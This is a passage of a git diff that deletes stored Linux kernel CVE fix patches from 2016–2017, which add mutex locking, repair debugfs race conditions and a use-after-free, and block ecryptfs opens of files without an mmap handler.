*work) -@@ -1459,7 +1461,9 @@ static void ngd_adsp_up(struct work_struct *work) - container_of(work, struct msm_slim_qmi, ssr_up); - struct msm_slim_ctrl *dev = - container_of(qmi, struct msm_slim_ctrl, qmi); -+ mutex_lock(&dev->ssr_lock); - ngd_slim_enable(dev, true); -+ mutex_unlock(&dev->ssr_lock); - } - - static ssize_t show_mask(struct device *device, struct device_attribute *attr, -@@ -1623,6 +1627,7 @@ static int ngd_slim_probe(struct platform_device *pdev) - init_completion(&dev->reconf); - init_completion(&dev->ctrl_up); - mutex_init(&dev->tx_lock); -+ mutex_init(&dev->ssr_lock); - spin_lock_init(&dev->tx_buf_lock); - spin_lock_init(&dev->rx_lock); - dev->ee = 1; -diff --git a/drivers/slimbus/slim-msm.h 
b/drivers/slimbus/slim-msm.h
-index dbb125d..0b4c4d3 100644
---- a/drivers/slimbus/slim-msm.h
-+++ b/drivers/slimbus/slim-msm.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2011-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2011-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -284,6 +284,7 @@ struct msm_slim_ctrl {
- struct clk *rclk;
- struct clk *hclk;
- struct mutex tx_lock;
-+ struct mutex ssr_lock;
- spinlock_t tx_buf_lock;
- u8 pgdla;
- enum msm_slim_msgq use_rx_msgqs;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10291/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-10291/3.18/0002.patch
deleted file mode 100644
index aaa8a0ff..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10291/3.18/0002.patch
+++ /dev/null
@@ -1,74 +0,0 @@ -From a225074c0494ca8125ca0ac2f9ebc8a2bd3612de Mon Sep 17 00:00:00 2001 -From: Dilip Kota -Date: Mon, 21 Mar 2016 11:28:51 +0530 -Subject: slim-msm: Synchronize SSR callbacks - -Subsystem will restart within short timeframe. -Synchronise subsytem up/down callback notifications -to avoid functionality failures. -Use mutex locks to achieve synchronization. - -Change-Id: I5881c7d468507bb8402a2e9f8178b9c31e57e8a5 -Signed-off-by: Dilip Kota ---- - drivers/slimbus/slim-msm-ngd.c | 5 +++++ - drivers/slimbus/slim-msm.h | 3 ++- - 2 files changed, 7 insertions(+), 1 deletion(-) - -diff --git a/drivers/slimbus/slim-msm-ngd.c b/drivers/slimbus/slim-msm-ngd.c -index 3684984..1328e76 100644 ---- a/drivers/slimbus/slim-msm-ngd.c -+++ b/drivers/slimbus/slim-msm-ngd.c -@@ -1449,11 +1449,13 @@ static void ngd_adsp_down(struct msm_slim_ctrl *dev) - struct slim_controller *ctrl = &dev->ctrl; - struct slim_device *sbdev; - -+ mutex_lock(&dev->ssr_lock); - ngd_slim_enable(dev, false); - /* device up should be called again after SSR */ - list_for_each_entry(sbdev, &ctrl->devs, dev_list) - slim_report_absent(sbdev); - SLIM_INFO(dev, "SLIM ADSP SSR (DOWN) done\n"); -+ mutex_unlock(&dev->ssr_lock); - } - - static void ngd_adsp_up(struct work_struct *work) -@@ -1462,7 +1464,9 @@ static void ngd_adsp_up(struct work_struct *work) - container_of(work, struct msm_slim_qmi, ssr_up); - struct msm_slim_ctrl *dev = - container_of(qmi, struct msm_slim_ctrl, qmi); -+ mutex_lock(&dev->ssr_lock); - ngd_slim_enable(dev, true); -+ mutex_unlock(&dev->ssr_lock); - } - - static ssize_t show_mask(struct device *device, struct device_attribute *attr, -@@ -1626,6 +1630,7 @@ static int ngd_slim_probe(struct platform_device *pdev) - init_completion(&dev->reconf); - init_completion(&dev->ctrl_up); - mutex_init(&dev->tx_lock); -+ mutex_init(&dev->ssr_lock); - spin_lock_init(&dev->tx_buf_lock); - spin_lock_init(&dev->rx_lock); - dev->ee = 1; -diff --git a/drivers/slimbus/slim-msm.h 
b/drivers/slimbus/slim-msm.h
-index 86d2606..7859d1e 100644
---- a/drivers/slimbus/slim-msm.h
-+++ b/drivers/slimbus/slim-msm.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2011-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2011-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -284,6 +284,7 @@ struct msm_slim_ctrl {
- struct clk *rclk;
- struct clk *hclk;
- struct mutex tx_lock;
-+ struct mutex ssr_lock;
- spinlock_t tx_buf_lock;
- u8 pgdla;
- enum msm_slim_msgq use_rx_msgqs;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10293/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10293/ANY/0001.patch
deleted file mode 100644
index 04ca3e4c..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10293/ANY/0001.patch
+++ /dev/null
@@ -1,184 +0,0 @@ -From 2469d5374745a2228f774adbca6fb95a79b9047f Mon Sep 17 00:00:00 2001 -From: Yang Xu -Date: Thu, 29 Oct 2015 17:46:15 +0800 -Subject: msm: mdss: Add debugfs support for panel command data type - -Register debugfs node to read from and write to the panel command -data type. The default data type is DCS_LONG_WRITE 0x39. - -Give following command in adb shell to read panel register: - cat /sys/kernel/debug/mdp/panel_cmd_data_type -To write panel command data type: - echo "command_data_type" > - /sys/kernel/debug/mdp/panel_cmd_data_type - -Change-Id: I6dbe5bccb3142e93400825eddf7f05180acfc710 -Signed-off-by: Yang Xu ---- - drivers/video/msm/mdss/mdss_debug.c | 73 ++++++++++++++++++++++--------------- - drivers/video/msm/mdss/mdss_debug.h | 3 +- - 2 files changed, 46 insertions(+), 30 deletions(-) - -diff --git a/drivers/video/msm/mdss/mdss_debug.c b/drivers/video/msm/mdss/mdss_debug.c -index eaeccac..13d2b16 100644 ---- a/drivers/video/msm/mdss/mdss_debug.c -+++ b/drivers/video/msm/mdss/mdss_debug.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2009-2014, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2009-2017, The Linux Foundation. All rights reserved. 
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -124,32 +124,22 @@ static ssize_t panel_debug_base_reg_write(struct file *file,
- const char __user *user_buf, size_t count, loff_t *ppos)
- {
- struct mdss_debug_base *dbg = file->private_data;
--
-- u32 cnt, tmp, i;
-- u32 len = 0;
- char buf[PANEL_TX_MAX_BUF] = {0x0};
-- char *p = NULL;
- char reg[PANEL_TX_MAX_BUF] = {0x0};
-+ u32 len = 0, step = 0, value = 0;
-+ char *bufp;
-
- struct mdss_data_type *mdata = mdss_res;
-- struct mdss_mdp_ctl *ctl = mdata->ctl_off + 0;
-- struct mdss_panel_data *panel_data = ctl->panel_data;
-- struct mdss_dsi_ctrl_pdata *ctrl_pdata = container_of(panel_data,
-- struct mdss_dsi_ctrl_pdata, panel_data);
--
-+ struct mdss_mdp_ctl *ctl;
-+ struct mdss_dsi_ctrl_pdata *ctrl_pdata;
- struct dsi_cmd_desc dsi_write_cmd = {
-- {DTYPE_GEN_LWRITE, 1, 0, 0, 0, 0/*len*/}, reg};
-+ {0/*data type*/, 1, 0, 0, 0, 0/* len */}, reg};
- struct dcs_cmd_req cmdreq;
-
-- cmdreq.cmds = &dsi_write_cmd;
-- cmdreq.cmds_cnt = 1;
-- cmdreq.flags = CMD_REQ_COMMIT;
-- cmdreq.rlen = 0;
-- cmdreq.cb = NULL;
--
- if (!dbg || !mdata)
- return -ENODEV;
-
-+ /* get command string from user */
- if (count >= sizeof(buf))
- return -EFAULT;
-
-@@ -158,26 +148,38 @@ static ssize_t panel_debug_base_reg_write(struct file *file,
-
- buf[count] = 0; /* end of string */
-
-- len = count / 3;
--
-+ bufp = buf;
-+ while (sscanf(bufp, "%x%n", &value, &step) > 0) {
-+ reg[len++] = value;
-+ if (len >= PANEL_TX_MAX_BUF) {
-+ pr_err("wrong input reg len\n");
-+ return -EFAULT;
-+ }
-+ bufp += step;
-+ }
- if (len < PANEL_CMD_MIN_TX_COUNT) {
- pr_err("wrong input reg len\n");
- return -EFAULT;
- }
-
-- for (i = 0; i < len; i++) {
-- p = buf + i * 3;
-- p[2] = 0;
-- pr_debug("p[%d] = %p:%s\n", i, p, p);
-- cnt = sscanf(p, "%x", &tmp);
-- reg[i] = tmp;
-- pr_debug("reg[%d] = %x\n", i, (int)reg[i]);
-- }
-+ /* put command to cmdlist */
-+ dsi_write_cmd.dchdr.dtype = dbg->cmd_data_type;
-+ dsi_write_cmd.dchdr.dlen = len;
-+ dsi_write_cmd.payload = reg;
-+
-+ cmdreq.cmds = &dsi_write_cmd;
-+ cmdreq.cmds_cnt = 1;
-+ cmdreq.flags = CMD_REQ_COMMIT;
-+ cmdreq.rlen = 0;
-+ cmdreq.cb = NULL;
-+
-+ ctl = mdata->ctl_off + 0;
-+ ctrl_pdata = container_of(ctl->panel_data,
-+ struct mdss_dsi_ctrl_pdata, panel_data);
-
- if (mdata->debug_inf.debug_enable_clock)
- mdata->debug_inf.debug_enable_clock(1);
-
-- dsi_write_cmd.dchdr.dlen = len;
- mdss_dsi_cmdlist_put(ctrl_pdata, &cmdreq);
-
- if (mdata->debug_inf.debug_enable_clock)
-@@ -262,7 +264,7 @@ int panel_debug_register_base(const char *name, void __iomem *base,
- struct mdss_data_type *mdata = mdss_res;
- struct mdss_debug_data *mdd;
- struct mdss_debug_base *dbg;
-- struct dentry *ent_off, *ent_reg;
-+ struct dentry *ent_off, *ent_reg, *ent_type;
- char dn[PANEL_DATA_NODE_LEN] = "";
- int prefix_len = 0;
-
-@@ -279,10 +281,20 @@ int panel_debug_register_base(const char *name, void __iomem *base,
- dbg->max_offset = max_offset;
- dbg->off = 0x0a;
- dbg->cnt = 0x01;
-+ dbg->cmd_data_type = DTYPE_DCS_LWRITE;
-
- if (name)
- prefix_len = snprintf(dn, sizeof(dn), "%s_", name);
-
-+ strlcpy(dn + prefix_len, "cmd_data_type", sizeof(dn) - prefix_len);
-+ ent_type = debugfs_create_x8(dn, 0644, mdd->root,
-+ (u8 *)&dbg->cmd_data_type);
-+
-+ if (IS_ERR_OR_NULL(ent_type)) {
-+ pr_err("debugfs_create_file: data_type fail\n");
-+ goto type_fail;
-+ }
-+
- strlcpy(dn + prefix_len, "off", sizeof(dn) - prefix_len);
- ent_off = debugfs_create_file(dn, 0644, mdd->root,
- dbg, &panel_off_fops);
-@@ -303,9 +315,12 @@ int panel_debug_register_base(const char *name, void __iomem *base,
- list_add(&dbg->head, &mdd->base_list);
-
- return 0;
-+
- reg_fail:
- debugfs_remove(ent_off);
- off_fail:
-+ debugfs_remove(ent_type);
-+type_fail:
- kfree(dbg);
- return -ENODEV;
- }
-diff --git a/drivers/video/msm/mdss/mdss_debug.h b/drivers/video/msm/mdss/mdss_debug.h
-index
ef665e7..1bb54d2 100644
---- a/drivers/video/msm/mdss/mdss_debug.h
-+++ b/drivers/video/msm/mdss/mdss_debug.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2014, 2017 The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -49,6 +49,7 @@ struct mdss_debug_base {
- void __iomem *base;
- size_t off;
- size_t cnt;
-+ u8 cmd_data_type;
- size_t max_offset;
- char *buf;
- size_t buf_len;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10294/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10294/ANY/0001.patch
deleted file mode 100644
index efdca413..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10294/ANY/0001.patch
+++ /dev/null
@@ -1,122 +0,0 @@
-From 9e9bc51ffb8a298f0be5befe346762cdb6e1d49c Mon Sep 17 00:00:00 2001
-From: ansharma
-Date: Wed, 18 Jan 2017 16:46:38 +0530
-Subject: power: qpnp-fg: Fix possible race condition in FG debugfs
-
-There is a possible race condition when FG debugfs files are concurrently
-accessed by multiple threads. Fix this.
-
-CRs-Fixed: 1105481
-Change-Id: I154e7f3cdd8d51cf67ef1dfd9d78f423f183cb64
-Signed-off-by: ansharma
----
- drivers/power/qpnp-fg.c | 34 ++++++++++++++++++++++++++--------
- 1 file changed, 26 insertions(+), 8 deletions(-)
-
-diff --git a/drivers/power/qpnp-fg.c b/drivers/power/qpnp-fg.c
-index 182b562..1e2fefc 100644
---- a/drivers/power/qpnp-fg.c
-+++ b/drivers/power/qpnp-fg.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -669,6 +669,7 @@ struct fg_trans {
- struct fg_chip *chip;
- struct fg_log_buffer *log; /* log buffer */
- u8 *data; /* fg data that is read */
-+ struct mutex memif_dfs_lock; /* Prevent thread concurrency */
- };
-
- struct fg_dbgfs {
-@@ -7514,6 +7515,7 @@ static int fg_memif_data_open(struct inode *inode, struct file *file)
- trans->addr = dbgfs_data.addr;
- trans->chip = dbgfs_data.chip;
- trans->offset = trans->addr;
-+ mutex_init(&trans->memif_dfs_lock);
-
- file->private_data = trans;
- return 0;
-@@ -7525,6 +7527,7 @@ static int fg_memif_dfs_close(struct inode *inode, struct file *file)
-
- if (trans && trans->log && trans->data) {
- file->private_data = NULL;
-+ mutex_destroy(&trans->memif_dfs_lock);
- kfree(trans->log);
- kfree(trans->data);
- kfree(trans);
-@@ -7682,10 +7685,13 @@ static ssize_t fg_memif_dfs_reg_read(struct file *file, char __user *buf,
- size_t ret;
- size_t len;
-
-+ mutex_lock(&trans->memif_dfs_lock);
- /* Is the the log buffer empty */
- if (log->rpos >= log->wpos) {
-- if (get_log_data(trans) <= 0)
-- return 0;
-+ if (get_log_data(trans) <= 0) {
-+ len = 0;
-+ goto unlock_mutex;
-+ }
- }
-
- len = min(count, log->wpos - log->rpos);
-@@ -7693,7 +7699,8 @@ static ssize_t fg_memif_dfs_reg_read(struct file *file, char __user *buf,
- ret = copy_to_user(buf, &log->data[log->rpos], len);
- if (ret == len) {
- pr_err("error copy sram register values to user\n");
-- return -EFAULT;
-+ len = -EFAULT;
-+ goto unlock_mutex;
- }
-
- /* 'ret' is the number of bytes not copied */
-@@ -7701,6 +7708,9 @@ static ssize_t fg_memif_dfs_reg_read(struct file *file, char __user *buf,
-
- *ppos += len;
- log->rpos += len;
-+
-+unlock_mutex:
-+ mutex_unlock(&trans->memif_dfs_lock);
- return len;
- }
-
-@@ -7721,14 +7731,20 @@ static ssize_t fg_memif_dfs_reg_write(struct file *file, const char __user *buf,
- int cnt = 0;
- u8 *values;
- size_t ret = 0;
-+ char *kbuf;
-+ u32 offset;
-
- struct fg_trans *trans = file->private_data;
-- u32 offset = trans->offset;
-+
-+ mutex_lock(&trans->memif_dfs_lock);
-+ offset = trans->offset;
-
- /* Make a copy of the user data */
-- char *kbuf = kmalloc(count + 1, GFP_KERNEL);
-- if (!kbuf)
-- return -ENOMEM;
-+ kbuf = kmalloc(count + 1, GFP_KERNEL);
-+ if (!kbuf) {
-+ ret = -ENOMEM;
-+ goto unlock_mutex;
-+ }
-
- ret = copy_from_user(kbuf, buf, count);
- if (ret == count) {
-@@ -7767,6 +7783,8 @@ static ssize_t fg_memif_dfs_reg_write(struct file *file, const char __user *buf,
-
- free_buf:
- kfree(kbuf);
-+unlock_mutex:
-+ mutex_unlock(&trans->memif_dfs_lock);
- return ret;
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10295/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10295/ANY/0001.patch
deleted file mode 100644
index 08b35d6f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10295/ANY/0001.patch
+++ /dev/null
@@ -1,238 +0,0 @@
-From f11ae3df500bc2a093ddffee6ea40da859de0fa9 Mon Sep 17 00:00:00 2001
-From: ansharma
-Date: Thu, 19 Jan 2017 20:22:14 +0530
-Subject: leds: qpnp-flash: Fix possible race condition in debugfs
-
-There is a possible race condition when debugfs files are concurrently
-accessed by multiple threads. Fix this.
-
-CRs-Fixed: 1109420, 1109326
-Change-Id: I19e9107079ac8d039b12a37ae612727f824552d4
-Signed-off-by: ansharma
----
- drivers/leds/leds-qpnp-flash.c | 80 ++++++++++++++++++++++++++++++------------
- 1 file changed, 57 insertions(+), 23 deletions(-)
-
-diff --git a/drivers/leds/leds-qpnp-flash.c b/drivers/leds/leds-qpnp-flash.c
-index 43298a7..56ba8f5 100644
---- a/drivers/leds/leds-qpnp-flash.c
-+++ b/drivers/leds/leds-qpnp-flash.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -225,6 +225,7 @@ struct flash_led_platform_data {
- };
-
- struct qpnp_flash_led_buffer {
-+ struct mutex debugfs_lock; /* Prevent thread concurrency */
- size_t rpos;
- size_t wpos;
- size_t len;
-@@ -280,6 +281,7 @@ static int flash_led_dbgfs_file_open(struct qpnp_flash_led *led,
- log->rpos = 0;
- log->wpos = 0;
- log->len = logbufsize - sizeof(*log);
-+ mutex_init(&log->debugfs_lock);
- led->log = log;
-
- led->buffer_cnt = 1;
-@@ -301,20 +303,26 @@ static int flash_led_dfs_close(struct inode *inode, struct file *file)
-
- if (led && led->log) {
- file->private_data = NULL;
-+ mutex_destroy(&led->log->debugfs_lock);
- kfree(led->log);
- }
-
- return 0;
- }
-
-+#define MIN_BUFFER_WRITE_LEN 20
- static int print_to_log(struct qpnp_flash_led_buffer *log,
- const char *fmt, ...)
- {
- va_list args;
- int cnt;
-- char *log_buf = &log->data[log->wpos];
-+ char *log_buf;
- size_t size = log->len - log->wpos;
-
-+ if (size < MIN_BUFFER_WRITE_LEN)
-+ return 0; /* not enough buffer left */
-+
-+ log_buf = &log->data[log->wpos];
- va_start(args, fmt);
- cnt = vscnprintf(log_buf, size, fmt, args);
- va_end(args);
-@@ -328,12 +336,14 @@ static ssize_t flash_led_dfs_latched_reg_read(struct file *fp, char __user *buf,
- struct qpnp_flash_led *led = fp->private_data;
- struct qpnp_flash_led_buffer *log = led->log;
- u8 val;
-- int rc;
-+ int rc = 0;
- size_t len;
- size_t ret;
-
-- if (log->rpos >= log->wpos && led->buffer_cnt == 0)
-- return 0;
-+ mutex_lock(&log->debugfs_lock);
-+ if ((log->rpos >= log->wpos && led->buffer_cnt == 0) ||
-+ ((log->len - log->wpos) < MIN_BUFFER_WRITE_LEN))
-+ goto unlock_mutex;
-
- rc = spmi_ext_register_readl(led->spmi_dev->ctrl,
- led->spmi_dev->sid, INT_LATCHED_STS(led->base), &val, 1);
-@@ -341,17 +351,17 @@ static ssize_t flash_led_dfs_latched_reg_read(struct file *fp, char __user *buf,
- dev_err(&led->spmi_dev->dev,
- "Unable to read from address %x, rc(%d)\n",
- INT_LATCHED_STS(led->base), rc);
-- return -EINVAL;
-+ goto unlock_mutex;
- }
- led->buffer_cnt--;
-
- rc = print_to_log(log, "0x%05X ", INT_LATCHED_STS(led->base));
- if (rc == 0)
-- return rc;
-+ goto unlock_mutex;
-
- rc = print_to_log(log, "0x%02X ", val);
- if (rc == 0)
-- return rc;
-+ goto unlock_mutex;
-
- if (log->wpos > 0 && log->data[log->wpos - 1] == ' ')
- log->data[log->wpos - 1] = '\n';
-@@ -361,36 +371,43 @@ static ssize_t flash_led_dfs_latched_reg_read(struct file *fp, char __user *buf,
- ret = copy_to_user(buf, &log->data[log->rpos], len);
- if (ret) {
- pr_err("error copy register value to user\n");
-- return -EFAULT;
-+ rc = -EFAULT;
-+ goto unlock_mutex;
- }
-
- len -= ret;
- *ppos += len;
- log->rpos += len;
-
-- return len;
-+ rc = len;
-+
-+unlock_mutex:
-+ mutex_unlock(&log->debugfs_lock);
-+ return rc;
- }
-
- static ssize_t flash_led_dfs_fault_reg_read(struct file *fp, char __user *buf,
- size_t count, loff_t *ppos) {
- struct qpnp_flash_led *led = fp->private_data;
- struct qpnp_flash_led_buffer *log = led->log;
-- int rc;
-+ int rc = 0;
- size_t len;
- size_t ret;
-
-- if (log->rpos >= log->wpos && led->buffer_cnt == 0)
-- return 0;
-+ mutex_lock(&log->debugfs_lock);
-+ if ((log->rpos >= log->wpos && led->buffer_cnt == 0) ||
-+ ((log->len - log->wpos) < MIN_BUFFER_WRITE_LEN))
-+ goto unlock_mutex;
-
- led->buffer_cnt--;
-
- rc = print_to_log(log, "0x%05X ", FLASH_LED_FAULT_STATUS(led->base));
- if (rc == 0)
-- return rc;
-+ goto unlock_mutex;
-
- rc = print_to_log(log, "0x%02X ", led->fault_reg);
- if (rc == 0)
-- return rc;
-+ goto unlock_mutex;
-
- if (log->wpos > 0 && log->data[log->wpos - 1] == ' ')
- log->data[log->wpos - 1] = '\n';
-@@ -400,14 +417,19 @@ static ssize_t flash_led_dfs_fault_reg_read(struct file *fp, char __user *buf,
- ret = copy_to_user(buf, &log->data[log->rpos], len);
- if (ret) {
- pr_err("error copy register value to user\n");
-- return -EFAULT;
-+ rc = -EFAULT;
-+ goto unlock_mutex;
- }
-
- len -= ret;
- *ppos += len;
- log->rpos += len;
-
-- return len;
-+ rc = len;
-+
-+unlock_mutex:
-+ mutex_unlock(&log->debugfs_lock);
-+ return rc;
- }
-
- static ssize_t flash_led_dfs_fault_reg_enable(struct file *file,
-@@ -420,10 +442,14 @@ static ssize_t flash_led_dfs_fault_reg_enable(struct file *file,
- size_t ret = 0;
-
- struct qpnp_flash_led *led = file->private_data;
-- char *kbuf = kmalloc(count + 1, GFP_KERNEL);
-+ char *kbuf;
-
-- if (!kbuf)
-- return -ENOMEM;
-+ mutex_lock(&led->log->debugfs_lock);
-+ kbuf = kmalloc(count + 1, GFP_KERNEL);
-+ if (!kbuf) {
-+ ret = -ENOMEM;
-+ goto unlock_mutex;
-+ }
-
- ret = copy_from_user(kbuf, buf, count);
- if (!ret) {
-@@ -452,6 +478,8 @@ static ssize_t flash_led_dfs_fault_reg_enable(struct file *file,
-
- free_buf:
- kfree(kbuf);
-+unlock_mutex:
-+ mutex_unlock(&led->log->debugfs_lock);
- return ret;
- }
-
-@@ -464,10 +492,14 @@ static ssize_t flash_led_dfs_dbg_enable(struct file *file,
- int data;
- size_t ret = 0;
- struct qpnp_flash_led *led = file->private_data;
-- char *kbuf = kmalloc(count + 1, GFP_KERNEL);
-+ char *kbuf;
-
-- if (!kbuf)
-- return -ENOMEM;
-+ mutex_lock(&led->log->debugfs_lock);
-+ kbuf = kmalloc(count + 1, GFP_KERNEL);
-+ if (!kbuf) {
-+ ret = -ENOMEM;
-+ goto unlock_mutex;
-+ }
-
- ret = copy_from_user(kbuf, buf, count);
- if (ret == count) {
-@@ -495,6 +527,8 @@ static ssize_t flash_led_dfs_dbg_enable(struct file *file,
-
- free_buf:
- kfree(kbuf);
-+unlock_mutex:
-+ mutex_unlock(&led->log->debugfs_lock);
- return ret;
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10296/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10296/ANY/0001.patch
deleted file mode 100644
index ac233c61..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10296/ANY/0001.patch
+++ /dev/null
@@ -1,88 +0,0 @@
-From a5e46d8635a2e28463b365aacdeab6750abd0d49 Mon Sep 17 00:00:00 2001
-From: Sahitya Tummala
-Date: Fri, 3 Feb 2017 13:24:19 +0530
-Subject: uio: fix potential use after free issue when accessing debug_buffer
-
-The variable debug_buffer is a global variable which is allocated
-and free'd when open/close is called on debugfs file -
-"/sys/kernel/debug/rmt_storage/info". The current code doesn't
-have locks to handle concurrent accesses to the above file.
-This results into use after free issue when debug_buffer is
-accessed by two threads at the same time. Fix this by adding
-a mutex lock to protect this global variable.
-
-Change-Id: I6bc3f0ae2d7fca3ca9fe8561612f5863b6c3268a
-Signed-off-by: Sahitya Tummala
----
- drivers/uio/msm_sharedmem/sharedmem_qmi.c | 17 ++++++++++++++---
- 1 file changed, 14 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/uio/msm_sharedmem/sharedmem_qmi.c b/drivers/uio/msm_sharedmem/sharedmem_qmi.c
-index 48fb17e..fd95dee 100644
---- a/drivers/uio/msm_sharedmem/sharedmem_qmi.c
-+++ b/drivers/uio/msm_sharedmem/sharedmem_qmi.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2015, 2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -223,6 +223,7 @@ static int sharedmem_qmi_req_cb(struct qmi_handle *handle, void *conn_h,
- #define DEBUG_BUF_SIZE (2048)
- static char *debug_buffer;
- static u32 debug_data_size;
-+static struct mutex dbg_buf_lock; /* mutex for debug_buffer */
-
- static ssize_t debug_read(struct file *file, char __user *buf,
- size_t count, loff_t *file_pos)
-@@ -279,21 +280,29 @@ static int debug_open(struct inode *inode, struct file *file)
- {
- u32 buffer_size;
-
-- if (debug_buffer != NULL)
-+ mutex_lock(&dbg_buf_lock);
-+ if (debug_buffer != NULL) {
-+ mutex_unlock(&dbg_buf_lock);
- return -EBUSY;
-+ }
- buffer_size = DEBUG_BUF_SIZE;
- debug_buffer = kzalloc(buffer_size, GFP_KERNEL);
-- if (debug_buffer == NULL)
-+ if (debug_buffer == NULL) {
-+ mutex_unlock(&dbg_buf_lock);
- return -ENOMEM;
-+ }
- debug_data_size = fill_debug_info(debug_buffer, buffer_size);
-+ mutex_unlock(&dbg_buf_lock);
- return 0;
- }
-
- static int debug_close(struct inode *inode, struct file *file)
- {
-+ mutex_lock(&dbg_buf_lock);
- kfree(debug_buffer);
- debug_buffer = NULL;
- debug_data_size = 0;
-+ mutex_unlock(&dbg_buf_lock);
- return 0;
- }
-
-@@ -324,6 +333,7 @@ static void debugfs_init(void)
- {
- struct dentry *f_ent;
-
-+ mutex_init(&dbg_buf_lock);
- dir_ent = debugfs_create_dir("rmt_storage", NULL);
- if (IS_ERR(dir_ent)) {
- pr_err("Failed to create debug_fs directory\n");
-@@ -352,6 +362,7 @@ static void debugfs_init(void)
- static void debugfs_exit(void)
- {
- debugfs_remove_recursive(dir_ent);
-+ mutex_destroy(&dbg_buf_lock);
- }
-
- static void sharedmem_qmi_svc_recv_msg(struct work_struct *work)
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-1583/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-1583/ANY/0002.patch
deleted file mode 100644
index a3e2dca7..00000000
--- a/Patches/Linux_CVEs/CVE-2016-1583/ANY/0002.patch
+++ /dev/null
@@ -1,59 +0,0 @@
-From 2f36db71009304b3f0b95afacd8eba1f9f046b87 Mon Sep 17 00:00:00 2001
-From: Jann Horn
-Date: Wed, 1 Jun 2016 11:55:06 +0200
-Subject: ecryptfs: forbid opening files without mmap handler
-
-This prevents users from triggering a stack overflow through a recursive
-invocation of pagefault handling that involves mapping procfs files into
-virtual memory.
-
-Signed-off-by: Jann Horn
-Acked-by: Tyler Hicks
-Cc: stable@vger.kernel.org
-Signed-off-by: Linus Torvalds
----
- fs/ecryptfs/kthread.c | 13 +++++++++++--
- 1 file changed, 11 insertions(+), 2 deletions(-)
-
-diff --git a/fs/ecryptfs/kthread.c b/fs/ecryptfs/kthread.c
-index 866bb18..e818f5a 100644
---- a/fs/ecryptfs/kthread.c
-+++ b/fs/ecryptfs/kthread.c
-@@ -25,6 +25,7 @@
- #include
- #include
- #include
-+#include
- #include "ecryptfs_kernel.h"
-
- struct ecryptfs_open_req {
-@@ -147,7 +148,7 @@ int ecryptfs_privileged_open(struct file **lower_file,
- flags |= IS_RDONLY(d_inode(lower_dentry)) ? O_RDONLY : O_RDWR;
- (*lower_file) = dentry_open(&req.path, flags, cred);
- if (!IS_ERR(*lower_file))
-- goto out;
-+ goto have_file;
- if ((flags & O_ACCMODE) == O_RDONLY) {
- rc = PTR_ERR((*lower_file));
- goto out;
-@@ -165,8 +166,16 @@ int ecryptfs_privileged_open(struct file **lower_file,
- mutex_unlock(&ecryptfs_kthread_ctl.mux);
- wake_up(&ecryptfs_kthread_ctl.wait);
- wait_for_completion(&req.done);
-- if (IS_ERR(*lower_file))
-+ if (IS_ERR(*lower_file)) {
- rc = PTR_ERR(*lower_file);
-+ goto out;
-+ }
-+have_file:
-+ if ((*lower_file)->f_op->mmap == NULL) {
-+ fput(*lower_file);
-+ *lower_file = NULL;
-+ rc = -EMEDIUMTYPE;
-+ }
- out:
- return rc;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-1583/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2016-1583/ANY/0003.patch
deleted file mode 100644
index 1aef35de..00000000
--- a/Patches/Linux_CVEs/CVE-2016-1583/ANY/0003.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 29d6455178a09e1dc340380c582b13356227e8df Mon Sep 17 00:00:00 2001
-From: Jann Horn
-Date: Wed, 1 Jun 2016 11:55:07 +0200
-Subject: sched: panic on corrupted stack end
-
-Until now, hitting this BUG_ON caused a recursive oops (because oops
-handling involves do_exit(), which calls into the scheduler, which in
-turn raises an oops), which caused stuff below the stack to be
-overwritten until a panic happened (e.g. via an oops in interrupt
